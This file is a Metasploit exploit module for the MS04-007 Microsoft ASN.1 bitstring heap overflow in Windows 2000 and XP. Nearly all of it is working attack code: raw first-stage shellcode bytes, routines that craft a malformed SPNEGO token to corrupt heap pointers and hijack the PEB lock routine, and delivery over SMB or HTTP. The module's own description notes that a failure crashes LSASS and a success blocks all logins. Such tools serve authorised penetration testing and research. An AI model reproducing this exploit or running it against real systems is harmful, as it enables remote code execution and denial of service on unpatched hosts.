metasploit-framework/modules/exploits/windows/smb/ms04_007_killbill.rb

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##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. This vulnerability is not related
to the bit string vulnerability described in eEye advisory
AD20040210-2. Both vulnerabilities were fixed in the
MS04-007 patch.
You are only allowed one attempt with this vulnerability. If
the payload fails to execute, the LSASS system service will
crash and the target system will automatically reboot itself
in 60 seconds. If the payload succeeeds, the system will no
longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A
reboot is required to restore proper functioning of an
exploited system.
This exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
},
'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],
'License' => BSD_LICENSE,
'References' =>
[
[ 'CVE', '2003-0818'],
[ 'OSVDB', '3902' ],
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
{
'Platform' => 'win',
},
],
],
'DisclosureDate' => 'Feb 10 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
], self.class)
end
# This exploit is too destructive to use during automated exploitation.
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
false
end
# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com
def exploit
# The first stage shellcode fixes the PEB pointer and cleans the heap
stage0 =
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
"\x08\x00\xeb\xfe"
token = spnego_token(stage0, payload.encoded)
case datastore['PROTO']
when 'smb'
exploit_smb(token)
when 'http'
exploit_http(token)
else
print_status("Invalid application protocol specified, use smb or http")
end
end
def exploit_smb(token)
connect
client = Rex::Proto::SMB::Client.new(sock)
begin
client.session_request(smb_hostname()) if not datastore['SMBDirect']
client.negotiate
client.session_setup_with_ntlmssp_blob(token)
rescue => e
if (e.to_s =~ /error code 0x00050001/)
print_error("The target system has already been exploited")
else
print_error("Error: #{e}")
end
end
handler
disconnect
end
def exploit_http(token)
connect
req = "GET / HTTP/1.0\r\n"
req << "Host: #{ datastore['RHOST']}\r\n"
req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
sock.put(req)
res = sock.get_once
if (res and res =~ /0x80090301/)
print_error("This server does not support the Negotiate protocol or has already been exploited")
end
if (res and res =~ /0x80090304/)
print_error("This server responded with error code 0x80090304 (wth?)")
end
handler
disconnect
end
# Returns an ASN.1 encoded string
def enc_asn1(str)
Rex::Proto::NTLM::Utils::asn1encode(str)
end
# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
"\x03" + enc_asn1("\x00" + str)
end
# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
"\x23" + enc_asn1(str_arr.join(''))
end
# Returns a BER encoded SPNEGO token
def spnego_token(stage0, stage1)
if !(stage0 and stage1)
print_status("Invalid parameters passed to spnego_token")
return
end
if (stage0.length > 1032)
print_status("The stage 0 shellcode is longer than 1032 bytes")
return
end
tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
if ((tag.length + stage1.length) > 1033)
print_status("The stage 1 shellcode is too long")
return
end
# The first two overwrites must succeed, so we write to an unused location
# in the PEB block. We don't care about the values, because after this the
# doubly linked list of free blocks is corrupted and we get to the second
# overwrite which is more useful.
fw = "\xf8\x0f\x01\x00" # 0x00010ff8
bk = "\xf8\x0f\x01"
# The second overwrite writes the address of our shellcode into the
# FastPebLockRoutine pointer in the PEB
peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
bitstring = enc_constr(
enc_bits("A" * 1024),
"\x03\x00",
enc_constr(
enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
enc_constr( enc_bits(fw + bk) ),
enc_constr(
enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
enc_constr(
enc_bits("\xeb\x06" + make_nops(6)),
enc_bits("D" * 1040)
)
)
)
)
token = "\x60" + enc_asn1( # Application Constructed Object
"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
"\xa0" + enc_asn1( # NegTokenInit (0xa0)
"\x30" + enc_asn1(
"\xa1" + enc_asn1(
bitstring
)
)
)
)
return token
end
end